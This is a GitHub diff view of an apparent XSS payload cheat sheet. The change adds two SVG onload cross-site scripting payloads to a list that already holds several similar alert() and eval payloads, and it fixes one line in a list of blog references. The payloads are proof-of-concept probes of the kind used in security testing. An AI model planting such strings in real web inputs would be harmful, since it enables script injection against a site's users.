File tree Expand file tree Collapse file tree 1 file changed +3
-1
lines changed Expand file tree Collapse file tree 1 file changed +3
-1
lines changed Original file line number Diff line number Diff line change @@ -204,6 +204,8 @@ Most tools are also suitable for blind XSS attacks:
204204< svg onload= alert (1 )//
205205< svg/ onload= alert (String .fromCharCode (88 ,83 ,83 ))>
206206< svg id= alert (1 ) onload= eval (id)>
207+ " ><svg onload=alert(1)>
208+ " >< svg onload= alert (' XSS' >
207209" ><svg/onload=alert(String.fromCharCode(88,83,83))>
208210" >< svg/ onload= alert (/ XSS/
209211< svg>< script href= data: ,alert (1 ) / > (` Firefox` self closing script)
@@ -616,4 +618,4 @@ Technical blogposts available at
616618- [ XSS via Host header - www.google.com/cse - Michał Bentkowski - April 22, 2015] ( http://blog.bentkowski.info/2015/04/xss-via-host-header-cse.html )
617619- [ Xssing Web With Unicodes - Rakesh Mane - August 3, 2017] ( http://blog.rakeshmane.com/2017/08/xssing-web-part-2.html )
618620- [ Yahoo Mail stored XSS - Jouko Pynnönen - January 19, 2016] ( https://klikki.fi/adv/yahoo.html )
619- - [ Yahoo Mail stored XSS #2 - Jouko Pynnönen - December 8, 2016] ( https://klikki.fi/adv/yahoo2.html )
621+ - [ Yahoo Mail stored XSS #2 - Jouko Pynnönen - December 8, 2016] ( https://klikki.fi/adv/yahoo2.html )
You can’t perform that action at this time.
0 commit comments